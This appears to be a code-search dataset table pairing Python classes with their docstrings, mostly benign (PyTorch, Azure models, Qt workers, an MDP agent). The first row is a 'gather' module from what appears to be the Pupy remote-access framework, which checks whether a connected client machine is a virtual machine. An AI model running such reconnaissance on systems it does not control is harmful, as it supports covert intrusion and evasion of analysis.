code stringlengths 4 4.48k | docstring stringlengths 1 6.45k | _id stringlengths 24 24 |
|---|---|---|
@config(category="gather", compatibilities=['windows', 'linux', 'darwin']) <NEW_LINE> class CheckVM(PupyModule): <NEW_LINE> <INDENT> dependencies = ['checkvm'] <NEW_LINE> @classmethod <NEW_LINE> def init_argparse(cls): <NEW_LINE> <INDENT> cls.arg_parser = PupyArgumentParser(prog="CheckVM", description=cls.__doc__) <NEW_LINE> <DEDENT> def run(self, args): <NEW_LINE> <INDENT> if self.client.is_windows(): <NEW_LINE> <INDENT> check_vm = self.client.remote('checkvm') <NEW_LINE> vms = check_vm.Check_VM().run() <NEW_LINE> if vms: <NEW_LINE> <INDENT> for vm in vms: <NEW_LINE> <INDENT> self.success(vm) <NEW_LINE> <DEDENT> <DEDENT> else: <NEW_LINE> <INDENT> self.error('No Virtual Machine found') <NEW_LINE> <DEDENT> <DEDENT> elif self.client.is_linux(): <NEW_LINE> <INDENT> checkvm = self.client.remote('checkvm', 'checkvm', False) <NEW_LINE> vm = checkvm() <NEW_LINE> if vm: <NEW_LINE> <INDENT> self.success('This appears to be a %s virtual machine' % vm) <NEW_LINE> <DEDENT> else: <NEW_LINE> <INDENT> self.success('This does not appear to be a virtual machine') <NEW_LINE> <DEDENT> <DEDENT> elif self.client.is_darwin(): <NEW_LINE> <INDENT> checkvm = self.client.remote('checkvm', 'checkvm', False) <NEW_LINE> self.info('Be patient, could take a while') <NEW_LINE> vm = checkvm() <NEW_LINE> if vm: <NEW_LINE> <INDENT> self.success('This appears to be a %s virtual machine' % vm) <NEW_LINE> <DEDENT> else: <NEW_LINE> <INDENT> self.success('This does not appear to be a virtual machine') | check if running on Virtual Machine | 62598fab38b623060ffa9039 |
class Constant: <NEW_LINE> <INDENT> def __init__(self, name): <NEW_LINE> <INDENT> self.name = name.lower() <NEW_LINE> <DEDENT> def __str__(self): <NEW_LINE> <INDENT> return self.name <NEW_LINE> <DEDENT> def __eq__(self, other): <NEW_LINE> <INDENT> return type(self) == type(self) and self.name == other.name <NEW_LINE> <DEDENT> def __hash__(self): <NEW_LINE> <INDENT> return hash(self.name) | A logic constant is an abstraction of an object.
Assertions or negations can be made of the constant's properties,
which constitute a predicate. | 62598fab2ae34c7f260ab082 |
class Week(callbacks.Plugin): <NEW_LINE> <INDENT> threaded = True <NEW_LINE> def week(self, irc, msg, args, weeknumber): <NEW_LINE> <INDENT> d = datetime.now() <NEW_LINE> curyear, curweek, _ = d.isocalendar() <NEW_LINE> ret = '' <NEW_LINE> if (weeknumber): <NEW_LINE> <INDENT> first_date = self.week_start_date(curyear, weeknumber) <NEW_LINE> last_date = timedelta(6) + first_date <NEW_LINE> ret = str(first_date) + " - " + str(last_date) <NEW_LINE> <DEDENT> else: <NEW_LINE> <INDENT> ret = str(curweek) <NEW_LINE> <DEDENT> irc.reply(ret) <NEW_LINE> <DEDENT> week = wrap(week, [optional('int')]) <NEW_LINE> def week_start_date(self, year, week): <NEW_LINE> <INDENT> d = date(year, 1, 1) <NEW_LINE> delta_days = d.isoweekday() - 1 <NEW_LINE> delta_weeks = week <NEW_LINE> if year == d.isocalendar()[0]: <NEW_LINE> <INDENT> delta_weeks -= 1 <NEW_LINE> <DEDENT> delta = timedelta(days=-delta_days, weeks=delta_weeks) <NEW_LINE> return d + delta | Add the help for "@plugin help Week" here
This should describe *how* to use this plugin. | 62598fabaad79263cf42e775 |
class Dropout2d(Module): <NEW_LINE> <INDENT> def __init__(self, p=0.5, inplace=False): <NEW_LINE> <INDENT> super(Dropout2d, self).__init__() <NEW_LINE> self.p = p <NEW_LINE> self.inplace = inplace <NEW_LINE> <DEDENT> def forward(self, input): <NEW_LINE> <INDENT> return self._backend.Dropout2d(self.p, self.training, self.inplace)(input) | Randomly zeroes whole channels of the input tensor.
The input is 4D (batch x channels, height, width) and each channel
is of size (1, height, width).
The channels to zero are randomized on every forward call.
Usually the input comes from Conv2d modules.
As described in the paper "Efficient Object Localization Using Convolutional
Networks" (http:arxiv.org/abs/1411.4280), if adjacent pixels within
feature maps are strongly correlated (as is normally the case in early
convolution layers) then iid dropout will not regularize the activations
and will otherwise just result in an effective learning rate decrease.
In this case, nn.Dropout2d will help promote independence between
feature maps and should be used instead.
Args:
p: probability of an element to be zeroed. Default: 0.5
inplace: If set to True, will do this operation in-place. Default: false
Input Shape: [*, *, *, *] : Input can be of any sizes of 4D shape
Output Shape:Same : Output is of the same shape as input
Examples:
>>> m = nn.Dropout2d(p=0.2)
>>> input = autograd.Variable(torch.randn(20, 16, 32, 32))
>>> output = m(input) | 62598fabdd821e528d6d8ed6 |
class QuestionDetailView(generics.RetrieveAPIView): <NEW_LINE> <INDENT> serializer_class = serializers.QuestionSerializer <NEW_LINE> queryset = Question.objects.all() <NEW_LINE> lookup_url_kwarg = "q_id" | Question detail
Return info about question:
id, title, text, publish date, author username, tags, votes count,
answers count and link to AnswerListView page. | 62598fab0c0af96317c56323 |
class ValueIterationAgent(ValueEstimationAgent): <NEW_LINE> <INDENT> def __init__(self, mdp, discount = 0.9, iterations = 100): <NEW_LINE> <INDENT> T = mdp.getTransitionStatesAndProbs <NEW_LINE> R = mdp.getReward <NEW_LINE> Act = mdp.getPossibleActions <NEW_LINE> self.mdp = mdp <NEW_LINE> self.discount = discount <NEW_LINE> self.iterations = iterations <NEW_LINE> disc = discount <NEW_LINE> values = util.Counter() <NEW_LINE> states = mdp.getStates() <NEW_LINE> for _ in range(iterations): <NEW_LINE> <INDENT> oldval = values.copy() <NEW_LINE> for s in states: <NEW_LINE> <INDENT> curr = [sum(((el[1]*(R(s, a, el[0])+disc*oldval[el[0]]) for el in T(s, a)))) for a in Act(s)] <NEW_LINE> values[s] = max(curr) if len(curr) else 0 <NEW_LINE> <DEDENT> <DEDENT> self.values = values <NEW_LINE> <DEDENT> def getValue(self, state): <NEW_LINE> <INDENT> return self.values[state] <NEW_LINE> <DEDENT> def computeQValueFromValues(self, state, action): <NEW_LINE> <INDENT> T = self.mdp.getTransitionStatesAndProbs <NEW_LINE> R = self.mdp.getReward <NEW_LINE> return sum((el[1]*(R(state, action, el[0])+self.discount*self.values[el[0]]) for el in T(state, action))) <NEW_LINE> <DEDENT> def computeActionFromValues(self, state): <NEW_LINE> <INDENT> bval = -float("inf") <NEW_LINE> b_action = None <NEW_LINE> for a in self.mdp.getPossibleActions(state): <NEW_LINE> <INDENT> new = self.computeQValueFromValues(state, a) <NEW_LINE> if new > bval: <NEW_LINE> <INDENT> bval = new <NEW_LINE> b_action = a <NEW_LINE> <DEDENT> <DEDENT> return b_action <NEW_LINE> <DEDENT> def getPolicy(self, state): <NEW_LINE> <INDENT> return self.computeActionFromValues(state) <NEW_LINE> <DEDENT> def getAction(self, state): <NEW_LINE> <INDENT> return self.computeActionFromValues(state) <NEW_LINE> <DEDENT> def getQValue(self, state, action): <NEW_LINE> <INDENT> return self.computeQValueFromValues(state, action) | * Please read learningAgents.py before reading this.*
A ValueIterationAgent takes a Markov decision process
(see mdp.py) on initialization and runs value iteration
for a given number of iterations using the supplied
discount factor. | 62598fab435de62698e9bd97 |
class ErrorInfo: <NEW_LINE> <INDENT> import_ctx = None <NEW_LINE> file = '' <NEW_LINE> type = '' <NEW_LINE> function_or_member = '' <NEW_LINE> line = 0 <NEW_LINE> message = '' <NEW_LINE> blocker = True <NEW_LINE> def __init__(self, import_ctx: List[Tuple[str, int]], file: str, typ: str, function_or_member: str, line: int, message: str, blocker: bool) -> None: <NEW_LINE> <INDENT> self.import_ctx = import_ctx <NEW_LINE> self.file = file <NEW_LINE> self.type = typ <NEW_LINE> self.function_or_member = function_or_member <NEW_LINE> self.line = line <NEW_LINE> self.message = message <NEW_LINE> self.blocker = blocker | Representation of a single error message. | 62598fab56ac1b37e630218d |
class IRegisteredConfEvent(IObjectEvent): <NEW_LINE> <INDENT> pass | pass | 62598fab71ff763f4b5e7710 |
class GenButtonEvent(wx.CommandEvent): <NEW_LINE> <INDENT> def __init__(self, eventType, id): <NEW_LINE> <INDENT> wx.CommandEvent.__init__(self, eventType, id) <NEW_LINE> self.isDown = False <NEW_LINE> self.theButton = None <NEW_LINE> <DEDENT> def SetIsDown(self, isDown): <NEW_LINE> <INDENT> self.isDown = isDown <NEW_LINE> <DEDENT> def GetIsDown(self): <NEW_LINE> <INDENT> return self.isDown <NEW_LINE> <DEDENT> def SetButtonObj(self, btn): <NEW_LINE> <INDENT> self.theButton = btn <NEW_LINE> <DEDENT> def GetButtonObj(self): <NEW_LINE> <INDENT> return self.theButton | Event sent from the generic buttons when the button is activated. | 62598fabd58c6744b42dc2a7 |
class DraftsRead(object): <NEW_LINE> <INDENT> openapi_types = { 'cursor': 'Cursor', 'data': 'list[DraftMetaRead]' } <NEW_LINE> attribute_map = { 'cursor': 'cursor', 'data': 'data' } <NEW_LINE> def __init__(self, cursor=None, data=None, local_vars_configuration=None): <NEW_LINE> <INDENT> if local_vars_configuration is None: <NEW_LINE> <INDENT> local_vars_configuration = Configuration() <NEW_LINE> <DEDENT> self.local_vars_configuration = local_vars_configuration <NEW_LINE> self._cursor = None <NEW_LINE> self._data = None <NEW_LINE> self.discriminator = None <NEW_LINE> if cursor is not None: <NEW_LINE> <INDENT> self.cursor = cursor <NEW_LINE> <DEDENT> if data is not None: <NEW_LINE> <INDENT> self.data = data <NEW_LINE> <DEDENT> <DEDENT> @property <NEW_LINE> def cursor(self): <NEW_LINE> <INDENT> return self._cursor <NEW_LINE> <DEDENT> @cursor.setter <NEW_LINE> def cursor(self, cursor): <NEW_LINE> <INDENT> self._cursor = cursor <NEW_LINE> <DEDENT> @property <NEW_LINE> def data(self): <NEW_LINE> <INDENT> return self._data <NEW_LINE> <DEDENT> @data.setter <NEW_LINE> def data(self, data): <NEW_LINE> <INDENT> self._data = data <NEW_LINE> <DEDENT> def to_dict(self): <NEW_LINE> <INDENT> result = {} <NEW_LINE> for attr, _ in six.iteritems(self.openapi_types): <NEW_LINE> <INDENT> value = getattr(self, attr) <NEW_LINE> if isinstance(value, list): <NEW_LINE> <INDENT> result[attr] = list(map( lambda x: x.to_dict() if hasattr(x, "to_dict") else x, value )) <NEW_LINE> <DEDENT> elif hasattr(value, "to_dict"): <NEW_LINE> <INDENT> result[attr] = value.to_dict() <NEW_LINE> <DEDENT> elif isinstance(value, dict): <NEW_LINE> <INDENT> result[attr] = dict(map( lambda item: (item[0], item[1].to_dict()) if hasattr(item[1], "to_dict") else item, value.items() )) <NEW_LINE> <DEDENT> else: <NEW_LINE> <INDENT> result[attr] = value <NEW_LINE> <DEDENT> <DEDENT> return result <NEW_LINE> <DEDENT> def to_str(self): <NEW_LINE> <INDENT> return pprint.pformat(self.to_dict()) <NEW_LINE> <DEDENT> def __repr__(self): <NEW_LINE> <INDENT> return self.to_str() <NEW_LINE> <DEDENT> def __eq__(self, other): <NEW_LINE> <INDENT> if not isinstance(other, DraftsRead): <NEW_LINE> <INDENT> return False <NEW_LINE> <DEDENT> return self.to_dict() == other.to_dict() <NEW_LINE> <DEDENT> def __ne__(self, other): <NEW_LINE> <INDENT> if not isinstance(other, DraftsRead): <NEW_LINE> <INDENT> return True <NEW_LINE> <DEDENT> return self.to_dict() != other.to_dict() | NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually. | 62598fab796e427e5384e735 |
class TestCase(TruncationTestCase): <NEW_LINE> <INDENT> async def _run_outcome(self, outcome, expecting_failure, testMethod) -> None: <NEW_LINE> <INDENT> _restore_default() <NEW_LINE> self.__db__ = Tortoise.get_connection("models") <NEW_LINE> if self.__db__.capabilities.supports_transactions: <NEW_LINE> <INDENT> connection = self.__db__._in_transaction().connection <NEW_LINE> async with TransactionTestContext(connection): <NEW_LINE> <INDENT> await super()._run_outcome(outcome, expecting_failure, testMethod) <NEW_LINE> <DEDENT> <DEDENT> else: <NEW_LINE> <INDENT> await super()._run_outcome(outcome, expecting_failure, testMethod) <NEW_LINE> <DEDENT> <DEDENT> async def _setUpDB(self) -> None: <NEW_LINE> <INDENT> pass <NEW_LINE> <DEDENT> async def _tearDownDB(self) -> None: <NEW_LINE> <INDENT> if self.__db__.capabilities.supports_transactions: <NEW_LINE> <INDENT> _restore_default() <NEW_LINE> <DEDENT> else: <NEW_LINE> <INDENT> await super()._tearDownDB() | An asyncio capable test class that will ensure that each test will be run at
separate transaction that will rollback on finish.
This is a fast test runner. Don't use it if your test uses transactions. | 62598fabbd1bec0571e15094 |
@implementer(IPollPlugin) <NEW_LINE> @adapter(IPoll) <NEW_LINE> class PollPlugin(object): <NEW_LINE> <INDENT> @property <NEW_LINE> def name(self): <NEW_LINE> <INDENT> raise NotImplementedError("Must be provided by subclass") <NEW_LINE> <DEDENT> @property <NEW_LINE> def title(self): <NEW_LINE> <INDENT> raise NotImplementedError("Must be provided by subclass") <NEW_LINE> <DEDENT> description = "" <NEW_LINE> selectable = True <NEW_LINE> long_description_tpl = None <NEW_LINE> priority = 100 <NEW_LINE> proposals_min = None <NEW_LINE> proposals_max = None <NEW_LINE> multiple_winners = None <NEW_LINE> recommended_for = None <NEW_LINE> criteria = [] <NEW_LINE> CRITERIA_FAILED = CRITERIA_FAILED <NEW_LINE> CRITERIA_DEPENDS = CRITERIA_DEPENDS <NEW_LINE> CRITERIA_SUCCESS = CRITERIA_SUCCESS <NEW_LINE> CRITERIA_ICONS = CRITERIA_ICONS <NEW_LINE> def __init__(self, context): <NEW_LINE> <INDENT> self.context = context <NEW_LINE> <DEDENT> @classmethod <NEW_LINE> def long_description(cls, request): <NEW_LINE> <INDENT> if cls.long_description_tpl is not None: <NEW_LINE> <INDENT> return render(cls.long_description_tpl, {"factory": cls}, request=request) <NEW_LINE> <DEDENT> <DEDENT> @classmethod <NEW_LINE> def get_criteria(cls): <NEW_LINE> <INDENT> for (k, title) in cls.CRITERIA: <NEW_LINE> <INDENT> criteria = getattr(cls, k, None) <NEW_LINE> if isinstance(criteria, Criteria): <NEW_LINE> <INDENT> yield (title, criteria) <NEW_LINE> <DEDENT> <DEDENT> <DEDENT> def get_vote_schema(self): <NEW_LINE> <INDENT> raise NotImplementedError("Must be provided by subclass") <NEW_LINE> <DEDENT> def get_vote_class(self): <NEW_LINE> <INDENT> return Vote <NEW_LINE> <DEDENT> def get_settings_schema(self): <NEW_LINE> <INDENT> return None <NEW_LINE> <DEDENT> def handle_start(self, request): <NEW_LINE> <INDENT> pass <NEW_LINE> <DEDENT> def handle_close(self): <NEW_LINE> <INDENT> raise NotImplementedError("Must be provided by subclass") <NEW_LINE> <DEDENT> def render_result(self, view): <NEW_LINE> <INDENT> raise NotImplementedError("Must be provided by subclass") <NEW_LINE> <DEDENT> def change_states_of(self): <NEW_LINE> <INDENT> return {} <NEW_LINE> <DEDENT> def render_raw_data(self): <NEW_LINE> <INDENT> return Response(unicode(self.context.ballots)) | Base class for poll plugins. Subclass this to make your own.
It's not usable by itself, since it doesn't implement the required interfaces.
See :mod:`voteit.core.models.interfaces.IPollPlugin` for documentation. | 62598fabdd821e528d6d8ed7 |
class mympirun_vsc_install_scripts(vsc_install_scripts): <NEW_LINE> <INDENT> def run(self): <NEW_LINE> <INDENT> vsc_install_scripts.run(self) <NEW_LINE> for script in self.original_outfiles: <NEW_LINE> <INDENT> if script.endswith(".py") or script.endswith(".sh"): <NEW_LINE> <INDENT> script = script[:-3] <NEW_LINE> <DEDENT> if script.endswith('/mympirun'): <NEW_LINE> <INDENT> rel_script = os.path.basename(script) <NEW_LINE> rel_script_dir = os.path.dirname(script) <NEW_LINE> previous_pwd = os.getcwd() <NEW_LINE> os.chdir(rel_script_dir) <NEW_LINE> for sym_name in MYMPIRUN_ALIASES: <NEW_LINE> <INDENT> if os.path.exists(sym_name): <NEW_LINE> <INDENT> os.remove(sym_name) <NEW_LINE> <DEDENT> os.symlink(rel_script, sym_name) <NEW_LINE> newoutfile = os.path.join(rel_script_dir, sym_name) <NEW_LINE> self.outfiles.append(newoutfile) <NEW_LINE> log.info("symlink %s to %s newoutfile %s" % (rel_script, sym_name, newoutfile)) <NEW_LINE> <DEDENT> os.chdir(previous_pwd) <NEW_LINE> abs_fakepath = os.path.join(self.install_dir, FAKE_SUBDIRECTORY_NAME) <NEW_LINE> if not os.path.isdir(abs_fakepath): <NEW_LINE> <INDENT> log.info("creating abs_fakepath %s" % abs_fakepath) <NEW_LINE> os.mkdir(abs_fakepath) <NEW_LINE> <DEDENT> else: <NEW_LINE> <INDENT> log.info("not creating abs_fakepath %s (already exists)" % abs_fakepath) <NEW_LINE> <DEDENT> os.chdir(abs_fakepath) <NEW_LINE> fake_mpirun = os.path.join(abs_fakepath, 'mpirun') <NEW_LINE> if os.path.exists(fake_mpirun): <NEW_LINE> <INDENT> os.remove(fake_mpirun) <NEW_LINE> <DEDENT> mympirun_src = '../%s' % rel_script <NEW_LINE> os.symlink(mympirun_src, 'mpirun') <NEW_LINE> self.outfiles.append(fake_mpirun) <NEW_LINE> log.info("symlink %s to %s newoutfile %s" % (mympirun_src, 'mpirun', fake_mpirun)) <NEW_LINE> os.chdir(previous_pwd) | Create the (fake) links for mympirun
also remove .sh and .py extensions from the scripts | 62598fab30dc7b766599f7ef |
class FollowView(APIView): <NEW_LINE> <INDENT> @staticmethod <NEW_LINE> def post(request): <NEW_LINE> <INDENT> request_user = request.user <NEW_LINE> target_user_id = int(request.data.get('target_user')) <NEW_LINE> target_user = get_user_model().objects.get(pk=target_user_id) <NEW_LINE> create_follow_relationship(request_user, target_user) <NEW_LINE> return Response(status=status.HTTP_201_CREATED) <NEW_LINE> <DEDENT> @staticmethod <NEW_LINE> def get(request): <NEW_LINE> <INDENT> following = get_people_user_follows(request.user) <NEW_LINE> return Response(UserSerializer(following, many=True).data) | A class based view to create and look up follow relationship. | 62598fab1f5feb6acb162bc2 |
class Person: <NEW_LINE> <INDENT> total = 0 <NEW_LINE> def __init__(self, _name, _age): <NEW_LINE> <INDENT> Person.total += 1 <NEW_LINE> self.name = _name <NEW_LINE> self.age = _age <NEW_LINE> <DEDENT> def getAge(self): <NEW_LINE> <INDENT> return self.age <NEW_LINE> <DEDENT> def getName(self): <NEW_LINE> <INDENT> return self.name <NEW_LINE> <DEDENT> @staticmethod <NEW_LINE> def getTotal(): <NEW_LINE> <INDENT> return Person.total <NEW_LINE> <DEDENT> @classmethod <NEW_LINE> def totalPlusN(c, n): <NEW_LINE> <INDENT> return c.total + n <NEW_LINE> <DEDENT> def __str__(self): <NEW_LINE> <INDENT> return "Name - {0}, Age - {1}".format(self.name, self.age) | Person Class with Name and Age as Properties
and Total as a Static Property | 62598fab2c8b7c6e89bd3768 |
class Worker(QRunnable): <NEW_LINE> <INDENT> def __init__(self, fn, *args, **kwargs): <NEW_LINE> <INDENT> super(Worker, self).__init__() <NEW_LINE> self.fn = fn <NEW_LINE> self.args = args <NEW_LINE> self.kwargs = kwargs <NEW_LINE> self.signals = WorkerSignals() <NEW_LINE> self.kwargs['progress_callback'] = self.signals.progress <NEW_LINE> <DEDENT> @pyqtSlot() <NEW_LINE> def run(self): <NEW_LINE> <INDENT> try: <NEW_LINE> <INDENT> result = self.fn( *self.args, **self.kwargs ) <NEW_LINE> <DEDENT> except: <NEW_LINE> <INDENT> traceback.print_exc() <NEW_LINE> exctype, value = sys.exc_info()[:2] <NEW_LINE> self.signals.error.emit((exctype, value, traceback.format_exc())) <NEW_LINE> <DEDENT> else: <NEW_LINE> <INDENT> self.signals.result.emit(result) <NEW_LINE> <DEDENT> finally: <NEW_LINE> <INDENT> self.signals.finished.emit() | Worker thread
Inherits from QRunnable to handler worker thread setup, signals and wrap-up.
:param callback: The function callback to run on this worker thread. Supplied args and
kwargs will be passed through to the runner.
:type callback: function
:param args: Arguments to pass to the callback function
:param kwargs: Keywords to pass to the callback function | 62598fab460517430c43202e |
class Track(object): <NEW_LINE> <INDENT> def __init__( self, filename, track_id=None, track_artist=None, track_title=None, subset=None, path=None ): <NEW_LINE> <INDENT> self.filename = filename <NEW_LINE> try: <NEW_LINE> <INDENT> split_name = filename.split(' - ') <NEW_LINE> self.id = int(split_name[0]) <NEW_LINE> self.artist = split_name[1] <NEW_LINE> self.title = split_name[2] <NEW_LINE> <DEDENT> except ValueError: <NEW_LINE> <INDENT> self.id = 0 <NEW_LINE> self.artist = track_artist <NEW_LINE> self.title = track_title <NEW_LINE> <DEDENT> self.path = path <NEW_LINE> self.subset = subset <NEW_LINE> self.targets = None <NEW_LINE> self.sources = None <NEW_LINE> self._audio = None <NEW_LINE> self._rate = None <NEW_LINE> <DEDENT> @property <NEW_LINE> def audio(self): <NEW_LINE> <INDENT> if self._audio is not None: <NEW_LINE> <INDENT> return self._audio <NEW_LINE> <DEDENT> else: <NEW_LINE> <INDENT> if os.path.exists(self.path): <NEW_LINE> <INDENT> audio, rate = sf.read(self.path, always_2d=True) <NEW_LINE> self._rate = rate <NEW_LINE> return audio <NEW_LINE> <DEDENT> else: <NEW_LINE> <INDENT> self._rate = None <NEW_LINE> self._audio = None <NEW_LINE> raise ValueError("Oops! %s cannot be loaded" % self.path) <NEW_LINE> <DEDENT> <DEDENT> <DEDENT> @property <NEW_LINE> def rate(self): <NEW_LINE> <INDENT> if self._rate is None: <NEW_LINE> <INDENT> if os.path.exists(self.path): <NEW_LINE> <INDENT> audio, rate = sf.read(self.path, always_2d=True) <NEW_LINE> self._rate = rate <NEW_LINE> return rate <NEW_LINE> <DEDENT> else: <NEW_LINE> <INDENT> self._rate = None <NEW_LINE> self._audio = None <NEW_LINE> raise ValueError("Oops! %s cannot be loaded" % self.path) <NEW_LINE> <DEDENT> <DEDENT> return self._rate <NEW_LINE> <DEDENT> @audio.setter <NEW_LINE> def audio(self, array): <NEW_LINE> <INDENT> self._audio = array <NEW_LINE> <DEDENT> @rate.setter <NEW_LINE> def rate(self, rate): <NEW_LINE> <INDENT> self._rate = rate <NEW_LINE> <DEDENT> def __repr__(self): <NEW_LINE> <INDENT> return "\n%d >> %s" % (self.id, self.path) | An audio Track which is mixture of several sources
and provides several targets
Attributes
----------
name : str
Track name
path : str
Absolute path of mixture audio file
subset : {'Test', 'Dev'}
belongs to subset
targets : OrderedDict
OrderedDict of mixted Targets for this Track
sources : Dict
Dict of ``Source`` objects for this ``Track`` | 62598faba8370b77170f037e |
class ActionNetwork(object): <NEW_LINE> <INDENT> def __init__(self, p_values, low_action, high_action, stochastic, eps, theta=0.15, sigma=0.2, use_gaussian_noise=False, act_noise=0.1, is_target=False, target_noise=0.2, noise_clip=0.5, parameter_noise=False): <NEW_LINE> <INDENT> deterministic_actions = ( (high_action - low_action) * p_values + low_action) <NEW_LINE> if use_gaussian_noise: <NEW_LINE> <INDENT> if is_target: <NEW_LINE> <INDENT> normal_sample = tf.random_normal( tf.shape(deterministic_actions), stddev=target_noise) <NEW_LINE> normal_sample = tf.clip_by_value(normal_sample, -noise_clip, noise_clip) <NEW_LINE> stochastic_actions = tf.clip_by_value( deterministic_actions + normal_sample, low_action, high_action) <NEW_LINE> <DEDENT> else: <NEW_LINE> <INDENT> normal_sample = tf.random_normal( tf.shape(deterministic_actions), stddev=act_noise) <NEW_LINE> stochastic_actions = tf.clip_by_value( deterministic_actions + normal_sample, low_action, high_action) <NEW_LINE> <DEDENT> <DEDENT> else: <NEW_LINE> <INDENT> exploration_sample = tf.get_variable( name="ornstein_uhlenbeck", dtype=tf.float32, initializer=low_action.size * [.0], trainable=False) <NEW_LINE> normal_sample = tf.random_normal( shape=[low_action.size], mean=0.0, stddev=1.0) <NEW_LINE> exploration_value = tf.assign_add( exploration_sample, theta * (.0 - exploration_sample) + sigma * normal_sample) <NEW_LINE> stochastic_actions = tf.clip_by_value( deterministic_actions + eps * (high_action - low_action) * exploration_value, low_action, high_action) <NEW_LINE> <DEDENT> self.actions = tf.cond( tf.logical_and(stochastic, not parameter_noise), lambda: stochastic_actions, lambda: deterministic_actions) | Acts as a stochastic policy for inference, but a deterministic policy
for training, thus ignoring the batch_size issue when constructing a
stochastic action. | 62598fab1b99ca400228f501 |
class Renderer(FPDF): <NEW_LINE> <INDENT> def __init__(self, music_box_object, paper_size=(279.4, 215.9), strip_separation=0, style={}): <NEW_LINE> <INDENT> super().__init__("l", "mm", paper_size) <NEW_LINE> self.set_author("Mexomagno") <NEW_LINE> self.set_auto_page_break(True) <NEW_LINE> self.set_margins(8, 6, 8) <NEW_LINE> self.alias_nb_pages() <NEW_LINE> self.set_compression(True) <NEW_LINE> self.music_box_object = music_box_object <NEW_LINE> self.strip_separation = strip_separation <NEW_LINE> self.generated = False <NEW_LINE> self.styles = style <NEW_LINE> <DEDENT> def generate(self, midi_file, output_file, song_title="NO-TITLE", song_author="NO-AUTHOR"): <NEW_LINE> <INDENT> if self.generated: <NEW_LINE> <INDENT> raise RuntimeError("Document was already generated!") <NEW_LINE> <DEDENT> self.set_title("{} - {} ({}x{})".format(song_title, song_author, self.w, self.h)) <NEW_LINE> parsed_notes = Parser.render_to_box(midi_file) <NEW_LINE> self.add_page() <NEW_LINE> strip_generator = StripGenerator(music_box_object=self.music_box_object, song_title=song_title, song_author=song_author, styles=self.styles) <NEW_LINE> current_y = - strip_generator.get_height() / 2 - self.strip_separation + self.t_margin <NEW_LINE> drawn_beats = 0 <NEW_LINE> while len(parsed_notes) > 0: <NEW_LINE> <INDENT> new_strip = strip_generator.new_strip(drawn_beats) <NEW_LINE> current_y += strip_generator.get_height() + self.strip_separation <NEW_LINE> if current_y + strip_generator.get_height() / 2 > self.h - self.b_margin: <NEW_LINE> <INDENT> self.add_page() <NEW_LINE> current_y = strip_generator.get_height() / 2 + self.t_margin <NEW_LINE> <DEDENT> parsed_notes, total_strip_beats = new_strip.draw(pdf=self, x0=self.l_margin, x1=self.w - self.r_margin, y=current_y, notes=parsed_notes) <NEW_LINE> drawn_beats += total_strip_beats <NEW_LINE> <DEDENT> self.generated = True <NEW_LINE> self.output(output_file, "F") | Represents a music box document.
All units in mm except for fonts, which are in points. | 62598fab7c178a314d78d43f |
@generic_repr <NEW_LINE> class ActionAbapRsusr002__IT_ACTGRPS(Base, StandardAuthSelectionOptionMixin, BaseMixin): <NEW_LINE> <INDENT> __tablename__ = pluginName+'__IT_ACTGRPS' <NEW_LINE> __table_args__ = {'extend_existing':True} <NEW_LINE> id = Column(Integer, primary_key=True) <NEW_LINE> parent_id = Column(Integer, ForeignKey(pluginName+'__params.id')) <NEW_LINE> LOW = Column(String(30), nullable=False, qt_label='Role Name', qt_description='Role Name', ) <NEW_LINE> HIGH = Column(String(30), nullable=True, qt_label='Role Name', qt_description='Role Name', ) | Selection Options for Roles | 62598fab44b2445a339b6941 |
class BackupPolicyDetails(msrest.serialization.Model): <NEW_LINE> <INDENT> _validation = { 'id': {'readonly': True}, 'name': {'readonly': True}, 'type': {'readonly': True}, 'backup_policy_id': {'readonly': True}, 'provisioning_state': {'readonly': True}, 'volumes_assigned': {'readonly': True}, 'volume_backups': {'readonly': True}, } <NEW_LINE> _attribute_map = { 'location': {'key': 'location', 'type': 'str'}, 'id': {'key': 'id', 'type': 'str'}, 'name': {'key': 'name', 'type': 'str'}, 'type': {'key': 'type', 'type': 'str'}, 'tags': {'key': 'tags', 'type': '{str}'}, 'backup_policy_id': {'key': 'properties.backupPolicyId', 'type': 'str'}, 'provisioning_state': {'key': 'properties.provisioningState', 'type': 'str'}, 'daily_backups_to_keep': {'key': 'properties.dailyBackupsToKeep', 'type': 'int'}, 'weekly_backups_to_keep': {'key': 'properties.weeklyBackupsToKeep', 'type': 'int'}, 'monthly_backups_to_keep': {'key': 'properties.monthlyBackupsToKeep', 'type': 'int'}, 'volumes_assigned': {'key': 'properties.volumesAssigned', 'type': 'int'}, 'enabled': {'key': 'properties.enabled', 'type': 'bool'}, 'volume_backups': {'key': 'properties.volumeBackups', 'type': '[VolumeBackups]'}, } <NEW_LINE> def __init__( self, *, location: Optional[str] = None, tags: Optional[Dict[str, str]] = None, daily_backups_to_keep: Optional[int] = None, weekly_backups_to_keep: Optional[int] = None, monthly_backups_to_keep: Optional[int] = None, enabled: Optional[bool] = None, **kwargs ): <NEW_LINE> <INDENT> super(BackupPolicyDetails, self).__init__(**kwargs) <NEW_LINE> self.location = location <NEW_LINE> self.id = None <NEW_LINE> self.name = None <NEW_LINE> self.type = None <NEW_LINE> self.tags = tags <NEW_LINE> self.backup_policy_id = None <NEW_LINE> self.provisioning_state = None <NEW_LINE> self.daily_backups_to_keep = daily_backups_to_keep <NEW_LINE> self.weekly_backups_to_keep = weekly_backups_to_keep <NEW_LINE> self.monthly_backups_to_keep = monthly_backups_to_keep <NEW_LINE> self.volumes_assigned = None <NEW_LINE> self.enabled = enabled <NEW_LINE> self.volume_backups = None | Backup policy properties.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar location: Resource location.
:vartype location: str
:ivar id: Resource Id.
:vartype id: str
:ivar name: Resource name.
:vartype name: str
:ivar type: Resource type.
:vartype type: str
:ivar tags: A set of tags. Resource tags.
:vartype tags: dict[str, str]
:ivar backup_policy_id: Backup Policy Resource ID.
:vartype backup_policy_id: str
:ivar provisioning_state: Azure lifecycle management.
:vartype provisioning_state: str
:ivar daily_backups_to_keep: Daily backups count to keep.
:vartype daily_backups_to_keep: int
:ivar weekly_backups_to_keep: Weekly backups count to keep.
:vartype weekly_backups_to_keep: int
:ivar monthly_backups_to_keep: Monthly backups count to keep.
:vartype monthly_backups_to_keep: int
:ivar volumes_assigned: Volumes using current backup policy.
:vartype volumes_assigned: int
:ivar enabled: The property to decide policy is enabled or not.
:vartype enabled: bool
:ivar volume_backups: A list of volumes assigned to this policy.
:vartype volume_backups: list[~azure.mgmt.netapp.models.VolumeBackups] | 62598fab0c0af96317c56325 |
